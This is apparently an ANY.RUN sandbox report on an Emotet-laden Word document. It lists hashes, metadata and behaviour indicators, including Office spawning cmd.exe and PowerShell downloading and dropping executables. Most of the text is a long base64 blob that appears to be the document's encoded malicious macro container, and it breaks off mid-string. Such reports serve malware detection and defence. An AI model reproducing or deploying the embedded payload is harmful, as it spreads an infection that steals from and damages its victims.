File name: Untitled-attachment-01222019.doc

Full analysis: https://app.any.run/tasks/c26f6d0d-78cc-4167-9593-4af2387a36e5
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It targets mostly corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: January 22, 2019, 19:53:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader, emotet-doc, emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5: 176EBC1F9B13C5967250154CEC968560
SHA1: 0AFDF4895BC2A8637B14477B052D3FF9666DFFCE
SHA256: 577FB0CDC3747915779DB95E7613E08BC1486ACDBF0F8543655CA2933C4FE540
SSDEEP: 3072:XmOEhGQCmUchjL/xSu90OoiLuDKZXfwKeljR1z:X/EhGQCmUc5xUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2956)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2956)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2572)
    • Application was dropped or rewritten from another process

      • 101.exe (PID: 2324)
      • 101.exe (PID: 3240)
      • wabmetagen.exe (PID: 3096)
      • wabmetagen.exe (PID: 3668)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3068)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2596)
    • Application launched itself

      • cmd.exe (PID: 2572)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4012)
      • cmd.exe (PID: 2572)
    • Creates files in the user directory

      • powershell.exe (PID: 3068)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3068)
      • 101.exe (PID: 3240)
    • Starts itself from another location

      • 101.exe (PID: 3240)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3068)
      • 101.exe (PID: 3240)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2956)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2956)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:22 16:49:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 16:49:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: 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 